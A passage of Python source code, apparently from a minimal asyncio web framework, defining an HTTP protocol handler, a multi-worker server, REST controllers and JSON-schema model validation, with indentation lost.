self.resp.body = value
@property
def status(self):
return self.resp.status
@status.setter
def status(self, value):
self.resp.status = value
@property
def msg(self):
return self.resp.msg
@msg.setter
def msg(self, value):
self.resp.msg = value
class HTTPProtocol(asyncio.Protocol):
def __init__(self, handler, loop):
self.parser = None
self.transport = None
self.handler = handler
self.loop = loop
self.ctx = None
def connection_made(self, transport):
self.parser = httptools.HttpRequestParser(self)
self.transport = transport
def on_url(self, url):
self.ctx = Context()
self.ctx.write = self.transport.write
url = httptools.parse_url(url)
self.ctx.req.path = url.path.decode()
self.ctx.req.method = self.parser.get_method().decode()
def on_header(self, name, value):
self.ctx.req.headers[name.decode()] = value.decode()
def on_body(self, body):
self.ctx.req.raw += body
def on_message_complete(self):
task = self.loop.create_task(self.handler(self.ctx))
task.add_done_callback(self.ctx.send)
def data_received(self, data):
self.parser.feed_data(data)
def connection_lost(self, exc):
self.transport.close()
class App:
def __init__(self):
self.workers = set()
self.routes = {}
def serve(self, sock):
loop = asyncio.new_event_loop()
server = loop.create_server(partial(HTTPProtocol, loop=loop, handler=self), sock=sock)
loop.create_task(server)
try:
loop.run_forever()
except KeyboardInterrupt:
server.close()
loop.close()
def listen(self, port=8000, host="127.0.0.1", workers=multiprocessing.cpu_count()):
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
pid = os.getpid()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setblocking(False)
sock.bind((host, port))
os.set_inheritable(sock.fileno(), True)
try:
print(f'[{pid}] Listening at: http://{host}:{port}')
print(f'[{pid}] Workers: {workers}')
for _ in range(workers):
worker = multiprocessing.Process(target=self.serve, kwargs=dict(sock=sock))
worker.daemon = True
worker.start()
print(f'[{pid}] Starting worker with pid: {worker.pid}')
self.workers.add(worker)
for worker in self.workers:
worker.join()
except KeyboardInterrupt:
print('\r', end='\r')
print(f'[{pid}] Server soft stopping')
for worker in self.workers:
worker.terminate()
worker.join()
print(f'[{pid}] Server stopped successfully!')
sock.close()
async def __call__(self, ctx):
try:
handler = self.routes.get(ctx.req.path)
if not handler:
raise HTTPException(404)
await handler(ctx).request()
except HTTPException as e:
ctx.status = e.status
ctx.body = e.msg or HTTPStatus(e.status).phrase
ctx.msg = e.properties
class Controller:
def __init__(self, ctx):
self.ctx = ctx
async def request(self):
handler = getattr(self, self.ctx.req.method.lower(), None)
if not handler:
raise HTTPException(405)
await handler()
class RESTController(Controller):
async def request(self):
self.ctx.headers['Content-Type'] = 'application/json'
await super().request()
self.ctx.body = json.dumps(self.ctx.body)
class Model:
schema = {}
@classmethod
def validate(cls, data):
errors = ErrorTree(Draft4Validator(cls.schema).iter_errors(data)).errors
if errors:
raise HTTPException(400, msg=str(errors))
return data
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.